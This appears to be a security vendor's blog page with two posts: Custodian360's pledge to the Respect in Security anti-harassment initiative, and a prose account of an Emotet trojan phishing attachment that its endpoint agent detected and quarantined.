Respect in Security Pledge

Custodian360 backs Respect in Security to remove harassment from the industry.

At Custodian360 we are proud to have signed up to Respect in Security and took our corporate pledge earlier this week. Respect in Security is an initiative setup to take a stand against all forms of harassment and support victims both online and in the workplace. As a corporate partner we will continue to ensure that all members of our team have a safe workplace, free from harassment or abuse.

The infosec community is a fantastic thing, made up of people from all walks of life but for too long there has been an underbelly that has soured the experience for some. If we all take a stand to stamp out any form of harassment and work to create a diverse and inclusive community the fantastic industry that we are lucky enough to work in will become and even better place.

Custodian360, as a member of the cybersecurity community committed to the prevention of all forms of harassment within our industry, hereby pledges its support for a workplace and community free from harassment and fear.

Harassment is any unwanted physical, verbal, or non-verbal conduct that has the purpose or effect of either violating a person’s dignity or creating an intimidating, hostile, degrading, humiliating or offensive environment for them. Harassment may be persistent or an isolated incident and may manifest obviously or be hidden or insidious. It may take place in person, by telephone or in writing, including emails, texts, or online communications such as social media. The definition of harassment applies equally to situations of direct communication as it does to situations of active exclusion of individuals, or solicitation of such communication or exclusion.

This pledge applies in the workplace as well as in work-related settings outside the workplace or outside the regular business day. We pledge that:

We will work to eliminate harassment, to include all employees, partners, customers, and interactions. Any form of harassment, even when not unlawful or directed at a protected category, will not be tolerated.

We will not tolerate, condone, or ignore any form of harassment no matter where it occurs, or the personnel involved.

We will ensure that staff members are not asked to operate in unsafe organisational or social environments.

We will empower employees, contractors and third parties to come forward with reports without fear of retaliation, and to immediately and respectfully respond without prejudice. We recognise that those reporting harassment are not in any way disloyal to the company or the community, and that everyone deserves to work in a positive environment.

We will protect the anonymity of those reporting suspected violations to the greatest extent reasonably possible.

We will regularly educate employees and contractors what constitutes harassment and why it’s never acceptable, while continually maintaining and actively reviewing our policy and reporting mechanisms.

We will regularly discuss reporting protocol with our employees and ensure that we make a public version of this protocol publicly available for external reference and use.

Emotet Returns

Emotet Trojan

 

Since its initial discovery in 2014, the Emotet trojan has become an increasingly dangerous and persistent threat to users and organisations across the globe. The US Department of Homeland Security CISA division, refers to emotet as ‘among the most costly and destructive malware’ affecting from small to large scale organisations of both the private and public sectors.

Emotet started out as a way to steal users banking details, the scope and capabilities of this trojan have changed drastically.

From spreading itself across a network infecting other machines to skimming Outlook contact information to use in spear phishing attacks to stealing browser history, user credentials and installing other malware such as backdoors and ransomware, emotet can be extremely damaging to an organisation. Also, due to Emotet being polymorphic and able to constantly change and modify itself, it is increasingly difficult to detect and prevent against using typical signature-based methods with hundreds of unique payload variants discovered daily.

Phishing Email Example

Phishing Email Example

Emotet trojans will generally arrive on a user’s machine via emails like the above example. Spam emails spoofing common brands and institutions (banks, government departments) with layouts and language designed to encourage the user to click on the malicious attachment or link to sites hosting the document for download.

Crimeware-as-a-service (CaaS) helps ensure that new versions of these email attachments can be generated and distributed on a near constant basis ensuring its ability to evade traditional AV on Zero-day.

We regularly see new Emotet detections and an example of a malicious emotet attachment that one of our agents detected had been created only 4 hours prior.

VT History

In a short span of time, a new .doc attachment was generated with a new file hash value which would be unknown to a traditional AV solution was attached and emailed to an unsuspecting user ready for the morning inbox clear-out.

At the time of the detection, our threat researcher uploaded a copy of the threat file to VirusTotal where only 8 other Vendors were aware of and had the file marked as malicious.

VT Detections

This means that on many other AV solutions, the file would have been allowed to run and would not have been detected.

For this example, the user clicks on the attachment unaware as the document starts delivery of the Emotet payload.

From the attack storyline on our management console, we can see that as soon as the doc is opened, it attempts to utilise PowerShell to run obfuscated code. Code obfuscation is one of the methods used by hackers to evade static analysis engines in Anti-Virus and help disguise their activity.

Story Line

In this case, the PowerShell code attempts to create a network connection to reach out to a compromised domain online and download the additional emotet payload to the users’ machine to exploit further.

For any business, such an attack could cause severe consequences that would translate to high financial costs and reputational damage.

In this case, the threat was detected by the behavioural engine of the agent which was able to determine that the activity exhibited by the threat was malicious and then, autonomously killed and quarantined the threat from the users’ machine. After the threat was investigated by our security analysts, the threat was successfully remediated against without any disruption or compromise to the user’s machine.

Without our agent in place on the user’s machine, the result may not have been as favourable.

 

Alex James – Lead Security Analyst – Custodian360